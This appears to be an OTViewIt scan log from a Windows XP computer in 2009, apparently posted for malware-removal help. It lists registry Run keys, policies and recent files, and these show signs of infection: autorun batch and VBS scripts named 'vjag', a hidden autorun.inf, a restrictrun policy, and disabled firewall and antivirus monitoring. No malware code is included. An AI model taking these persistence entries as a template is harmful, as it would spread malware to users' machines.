"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}" (HKLM) -- C:\WINDOWS\system32\ieframe.dll (Microsoft Corporation)

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\SOFTWARE\Microsoft\Internet Explorer\Main]
"Local Page"=C:\WINDOWS\system32\blank.htm
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}" (HKLM) -- C:\WINDOWS\system32\ieframe.dll (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\SOFTWARE\Microsoft\Internet Explorer\Main]
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}" (HKLM) -- C:\WINDOWS\system32\ieframe.dll (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

========== (O1) Hosts File ==========

HOSTS File = (734 bytes) - C:\WINDOWS\System32\drivers\etc\Hosts
First 25 entries...
127.0.0.1 localhost

========== (O2) BHO's ==========

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} (HKLM) -- C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
{201f27d4-3704-41d6-89c1-aa35e39143ed} (HKLM) -- C:\Program Files\AskBarDis\bar\bin\askBar.dll ()
{39EA7695-B3F2-4C44-A4BC-297ADA8FD235} (HKLM) -- C:\Program Files\Sophos\Sophos Anti-Virus\SophosBHO.dll (Sophos Plc)
{53707962-6F74-2D53-2644-206D7942484F} (HKLM) -- C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
{67BCF957-85FC-4036-8DC4-D4D80E00A77B} (HKLM) -- C:\Program Files\SMART Technologies Inc\Notebook Software\NotebookPlugin.dll (SMART Technologies Inc.)
{DBC80044-A445-435b-BC74-9C25C1C588A9} (HKLM) -- C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
{E7E6F031-17CE-4C07-BC86-EABFE594F69C} (HKLM) -- C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll (Sun Microsystems, Inc.)

========== (O3) Toolbars ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar]
"{3041d03e-fd4b-44e0-b742-2d9b88305f98}" (HKLM) -- C:\Program Files\AskBarDis\bar\bin\askBar.dll ()

========== (O4) Run Keys ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Speed Launcher"="C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe" (Adobe Systems Incorporated)
"igfxhkcmd"=C:\WINDOWS\system32\hkcmd.exe (Intel Corporation)
"igfxpers"=C:\WINDOWS\system32\igfxpers.exe (Intel Corporation)
"igfxtray"=C:\WINDOWS\system32\igfxtray.exe (Intel Corporation)
"ISUSPM Startup"=C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup (InstallShield Software Corporation)
"ISUSScheduler"="C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start (InstallShield Software Corporation)
"iTunesHelper"="C:\Program Files\iTunes\iTunesHelper.exe" (Apple Inc.)
"PDVDDXSrv"="C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe" (CyberLink Corp.)
"SoundMAXPnP"=C:\Program Files\Analog Devices\Core\smax4pnp.exe (Analog Devices, Inc.)
"SunJavaUpdateSched"="C:\Program Files\Java\jre6\bin\jusched.exe" (Sun Microsystems, Inc.)
"vjag"=C:\WINDOWS\system32\auto\vjag3.bat ()
"vjag2"=C:\WINDOWS\system32\auto\vjag.vbs ()
"Windows Defender"="C:\Program Files\Windows Defender\MSASCui.exe" -hide (Microsoft Corporation)

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SpybotSD TeaTimer"=C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DWQueuedReporting"="C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (Microsoft Corporation)

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DWQueuedReporting"="C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SpybotSD TeaTimer"=C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)

========== (O4) RunOnce Keys ==========

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"RunNarrator"=Narrator.exe (Microsoft Corporation)

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"RunNarrator"=Narrator.exe (Microsoft Corporation)

========== (O4) Startup Folders ==========

[2009/01/28 07:24:29 | 00,245,760 | ---- | M] (Sophos Plc) -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\AutoUpdate Monitor.lnk = C:\Program Files\Sophos\AutoUpdate\ALMon.exe
[2007/11/02 05:48:46 | 04,519,176 | ---- | M] (SMART Technologies Inc.) -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\SMART Board Tools.lnk = C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe

========== (O6 & O7) Current Version Policies ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"HonorAutoRunSetting"=1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"HideStartupScripts"=0

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145
"Restrictrun"=1

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\restrictrun]
"1"=vjag.vbs
"2"=C:\WINDOWS\system32\notepad.exe -- [2008/04/14 05:42:30 | 00,069,120 | ---- | M] (Microsoft Corporation)
"3"=winword.exe
"4"=C:\WINDOWS\explorer.exe -- [2008/04/14 05:42:20 | 01,033,728 | ---- | M] (Microsoft Corporation)
"5"=powerpnt.exe
"6"=vj.doc
"7"=excel.exe
"8"=vjag1.bat
"9"=vjag2.vbs
"10"=vjag.bat
"11"=vjag2.bat
"12"=vstart.bat
"13"=autorun.inf
"14"=C:\WINDOWS\system32\vjag.doc -- [2009/04/01 08:54:10 | 00,001,844 | -HS- | M] ()

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

========== (O9) IE Extensions ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\]
{92780B25-18CC-41C8-B9BE-3C9C571A8263}: Button: Research -- %ProgramFiles%\Microsoft Office\Office12\REFIEBAR.DLL [2006/10/26 20:12:22 | 00,040,424 | ---- | M] (Microsoft Corporation)
{DFB852A3-47F8-48C4-A200-58CAB36FD2A2}: Menu: Spybot - Search && Destroy Configuration -- %ProgramFiles%\Spybot - Search & Destroy\SDHelper.dll [2009/01/26 15:31:02 | 01,879,896 | ---- | M] (Safer Networking Limited)
{e2e2dd38-d088-4134-82b7-f2ba38496583}: Menu: @xpsp3res.dll,-20001 -- %SystemRoot%\network diagnostic\xpnetdiag.exe [2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation)
{FB5F1910-F110-11d2-BB9E-00C04F795683}: Button: Messenger -- %ProgramFiles%\Messenger\msmsgs.exe [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)
{FB5F1910-F110-11d2-BB9E-00C04F795683}: Menu: Windows Messenger -- %ProgramFiles%\Messenger\msmsgs.exe [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Extensions\]
CmdMapping\\{FB5F1910-F110-11d2-BB9E-00C04F795683} [HKLM] -> %ProgramFiles%\Messenger\msmsgs.exe [Messenger] -> [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Internet Explorer\Extensions\]
CmdMapping\\{FB5F1910-F110-11d2-BB9E-00C04F795683} [HKLM] -> %ProgramFiles%\Messenger\msmsgs.exe [Messenger] -> [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)

========== (O12) Internet Explorer Plugins ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\]
PluginsPage: "" = http://activex.microsoft.com/controls/find...=%s&mime=%s
PluginsPageFriendlyName: "" = Microsoft ActiveX Gallery

========== (O13) Default Prefixes ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix]
""=http://

========== (O15) Trusted Sites ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\]
1 domain(s) and sub-domain(s) not assigned to a zone.

========== (O16) DPF ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\]
{166B1BCA-3F9C-11CF-8075-444553540000}: http://fpdownload.macromedia.com/get/shock...director/sw.cab -- Shockwave ActiveX Control
{6414512B-B978-451D-A0D8-FCFDF33E833C}: http://www.update.microsoft.com/windowsupd...b?1207692023140 -- WUWebControl Class
{8AD9C840-044E-11D1-B3E9-00805F499D93}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_13
{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}: http://fpdownload.macromedia.com/get/flash...t/ultrashim.cab -- Reg Error: Key does not exist or could not be opened.
{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Reg Error: Key does not exist or could not be opened.
{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_13
{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_13

========== (O17) DNS Name Servers ==========

{29FD7304-5CDF-4582-9D6B-1D5C0F2E5860} (Servers: | Description: )
{346168FD-2809-4FCB-832C-E763CD35D89D} (Servers: | Description: Broadcom NetXtreme 57xx Gigabit Controller)

========== (O20) AppInit_DLLs ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_Dlls"=C:\PROGRA~1\Sophos\SOPHOS~1\SOPHOS~1.DLL
>[2009/04/02 05:00:31 | 00,164,864 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sophos_detoured.dll

========== (O20) Winlogon Notify Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\]
igfxcui: "DllName" = igfxdev.dll -- C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)

========== Shell Execute Hooks ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{091EB208-39DD-417D-A5DD-7E2C2D8FB9CB}" (HKLM) -- C:\Program Files\Windows Defender\MpShHook.dll (Microsoft Corporation)

========== Safeboot Options ==========

"AlternateShell"=cmd.exe

========== CDRom AutoRun Settings ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom]
"AutoRun" = 1

========== Autorun Files on Drives ==========

auto []
[2009/03/20 08:56:44 | 00,000,000 | -HSD | M] -- C:\auto -- [ NTFS ]

AUTOEXEC.BAT []
[2008/04/08 16:45:12 | 00,000,000 | ---- | M] () -- C:\AUTOEXEC.BAT -- [ NTFS ]
Unable to obtain root file information for disk C:\

autorun.inf [[autorun] | shell=open | ]
[2001/06/19 06:18:46 | 00,000,021 | R--- | M] () -- D:\autorun.inf -- [ CDFS ]
Unable to obtain root file information for disk E:\

========== MountPoints2 ==========

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{eea0ca55-325e-11dd-9de7-806d6172696f}\Shell]
""=Autorun

========== Files/Folders - Created Within 60 Days ==========

[1 C:\WINDOWS\System32\*.tmp files]
[6 C:\WINDOWS\*.tmp files]
[2009/04/02 14:57:18 | 00,422,912 | ---- | C] (OldTimer Tools) -- C:\Documents and Settings\administrator.VVIEW\Desktop\powerpnt.exe.exe
[2009/04/01 13:49:56 | 04,840,017 | ---- | C] () -- C:\Documents and Settings\administrator.VVIEW\Desktop\Virus Script.rtf
[2009/04/01 13:34:39 | 00,000,000 | -H-D | C] -- C:\WINDOWS\System32\GroupPolicy
[2009/04/01 10:06:40 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Sun
[2009/04/01 09:50:54 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\GlarySoft
[2009/04/01 09:49:15 | 00,000,000 | ---D | C] -- C:\Program Files\AskBarDis
[2009/04/01 09:49:15 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Mozilla
[2009/04/01 09:42:37 | 00,000,410 | ---- | C] () -- C:\WINDOWS\tasks\Schedule Task Weekly.job
[2009/04/01 09:42:31 | 00,000,000 | ---D | C] -- C:\Program Files\Registry Easy
[2009/04/01 09:15:17 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Auslogics
[2009/04/01 09:05:24 | 00,000,000 | ---- | C] () -- C:\WINDOWS\System32\MSVolume.dll
[2009/04/01 09:05:20 | 00,000,000 | ---D | C] -- C:\Program Files\Registry_Cleaner_Pro
[2009/04/01 09:02:08 | 00,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\TEMP
@Alternate Data Stream - 116 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:D1B5B4F1
[2009/04/01 09:02:00 | 00,000,000 | ---D | C] -- C:\Program Files\Registry Mechanic
[2009/04/01 08:54:48 | 00,000,162 | -H-- | C] () -- C:\WINDOWS\System32\~$vjag.doc
[2009/04/01 08:18:36 | 00,000,000 | ---D | C] -- C:\Program Files\Spybot - Search & Destroy
[2009/04/01 08:18:36 | 00,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
[2009/04/01 08:00:27 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Macromedia
[2009/04/01 07:57:50 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Adobe
[2009/03/31 16:26:03 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Local Settings\Application Data\Sophos
[2009/03/31 16:25:00 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\U3
[2009/03/20 09:03:58 | 02,441,022 | -HS- | C] () -- C:\autorun.inf
[2009/03/20 08:57:33 | 00,000,000 | -HSD | C] -- C:\auto
[2009/03/20 08:56:46 | 00,001,844 | -HS- | C] () -- C:\WINDOWS\System32\vjag.doc
[2009/03/20 08:56:44 | 00,000,000 | RHSD | C] -- C:\WINDOWS\System32\auto
[2009/03/20 08:56:12 | 00,021,504 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\hidserv.dll
[2009/03/20 08:56:12 | 00,021,504 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\hidserv.dll
[2009/03/20 08:56:06 | 00,032,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\drivers\usbccgp.sys
[2009/03/20 08:56:06 | 00,032,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\usbccgp.sys
[2009/03/06 13:11:08 | 00,000,000 | ---D | C] -- C:\Library
[2009/03/06 13:10:37 | 00,000,000 | ---D | C] -- C:\Program Files\PEM
[2009/03/06 13:10:32 | 00,000,000 | -H-D | C] -- C:\Program Files\Zero G Registry
[2009/03/06 13:10:32 | 00,000,000 | ---D | C] -- C:\Program Files\TestNav
[2009/02/11 16:01:29 | 00,000,000 | ---D | C] -- C:\WINDOWS\SQL9_KB960089_ENU

========== Files - Modified Within 60 Days ==========

[1 C:\WINDOWS\System32\*.tmp files]
[6 C:\WINDOWS\*.tmp files]
[2009/04/02 14:57:36 | 02,441,022 | -HS- | M] () -- C:\autorun.inf
[2009/04/02 14:55:44 | 00,000,402 | ---- | M] () -- C:\WINDOWS\tasks\gpupdate.job
[2009/04/02 14:55:42 | 00,002,206 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2009/04/02 14:55:17 | 00,000,330 | -H-- | M] () -- C:\WINDOWS\tasks\MP Scheduled Scan.job
[2009/04/02 14:51:54 | 00,000,006 | -H-- | M] () -- C:\WINDOWS\tasks\SA.DAT
[2009/04/02 14:51:46 | 00,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2009/04/02 14:23:20 | 05,362,852 | -H-- | M] () -- C:\Documents and Settings\administrator.VVIEW\Local Settings\Application Data\IconCache.db
[2009/04/02 13:33:26 | 00,422,912 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\administrator.VVIEW\Desktop\powerpnt.exe.exe
[2009/04/01 13:49:56 | 04,840,017 | ---- | M] () -- C:\Documents and Settings\administrator.VVIEW\Desktop\Virus Script.rtf
[2009/04/01 12:00:53 | 00,000,410 | ---- | M] () -- C:\WINDOWS\tasks\Schedule Task Weekly.job
[2009/04/01 09:05:24 | 00,000,000 | ---- | M] () -- C:\WINDOWS\System32\MSVolume.dll
[2009/04/01 08:54:48 | 00,000,162 | -H-- | M] () -- C:\WINDOWS\System32\~$vjag.doc
[2009/04/01 08:54:10 | 00,001,844 | -HS- | M] () -- C:\WINDOWS\System32\vjag.doc
[2009/03/23 08:15:27 | 00,001,724 | -H-- | M] () -- C:\Documents and Settings\administrator.VVIEW\My Documents\Default.rdp
[2009/03/20 16:04:01 | 00,000,284 | ---- | M] () -- C:\WINDOWS\tasks\AppleSoftwareUpdate.job
[2009/03/20 13:27:06 | 00,000,072 | ---- | M] () -- C:\WINDOWS\bi_group.ini
[2009/03/20 09:08:14 | 00,523,324 | ---- | M] () -- C:\WINDOWS\System32\PerfStringBackup.INI
[2009/03/20 09:08:14 | 00,488,332 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2009/03/20 09:08:14 | 00,088,830 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2009/03/16 15:07:22 | 00,278,152 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2009/03/16 15:01:22 | 00,001,374 | ---- | M] () -- C:\WINDOWS\imsins.BAK
[2009/02/26 06:02:48 | 00,038,528 | ---- | M] (Sophos Plc) -- C:\WINDOWS\System32\drivers\savonaccessfilter.sys
[2009/02/26 06:02:37 | 00,110,848 | ---- | M] (Sophos Plc) -- C:\WINDOWS\System32\drivers\savonaccesscontrol.sys
[2009/02/25 15:54:59 | 24,768,960 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\MRT.exe
[2009/02/09 06:13:27 | 01,846,784 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\win32k.sys
[2009/02/09 06:13:27 | 01,846,784 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\win32k.sys

========== Custom Scans ==========

< End of report >


extras
OTViewIt Extras logfile created on: 4/2/2009 2:57:43 PM - Run
OTViewIt by OldTimer - Version 1.0.21.0 Folder = C:\Documents and Settings\administrator.VVIEW\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

1.99 Gb Total Physical Memory | 1.30 Gb Available Physical Memory | 65.48% Memory free
3.84 Gb Paging File | 3.31 Gb Available in Paging File | 86.22% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092;

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 74.50 Gb Total Space | 61.36 Gb Free Space | 82.37% Space Free | Partition Type: NTFS
Drive D: | 64.77 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS
Drive E: | 1.86 Gb Total Space | 0.15 Gb Free Space | 8.30% Space Free | Partition Type: FAT
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded

Computer Name: 103_LIB_S3
Current User Name: Administrator
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: All users
Whitelist: On
File Age = 60 Days

========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirstRunDisabled"=1
"AntiVirusDisableNotify"=0
"FirewallDisableNotify"=0
"UpdatesDisableNotify"=0
"AntiVirusOverride"=0
"FirewallOverride"=0
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]
"DisableMonitoring"=1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
"EnableFirewall"=0
"DoNotAllowExceptions"=0
"DisableNotifications"=0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts]

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
[2008/04/14 05:42:36 | 00,141,312 | ---- | M] (Microsoft Corporation) -- %windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019
[2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation) -- %windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe:*:Enabled:Dell Enhanced TCP/IP

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
[2008/04/14 05:42:36 | 00,141,312 | ---- | M] (Microsoft Corporation) -- %windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019
[2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation) -- %windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe:*:Enabled:Bonjour
[2008/03/30 10:36:34 | 20,638,504 | ---- | M] (Apple Inc.) -- C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes
[2008/05/21 04:37:24 | 12,844,576 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe:*:Enabled:Dell Enhanced TCP/IP

========== (O10) Winsock2 Catalogs ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\]
NameSpace_Catalog5\Catalog_Entries\000000000004 [mdnsNSP] -- C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)

========== (O18) Protocol Handlers ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
ipp: [HKLM - No CLSID value]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL ipp\0x00000001:{E1D2BF42-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAMON.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
msdaipp: [HKLM - No CLSID value]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL msdaipp\0x00000001:{E1D2BF42-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAMON.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL msdaipp\oledb:{E1D2BF40-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAIPP.BINDER]

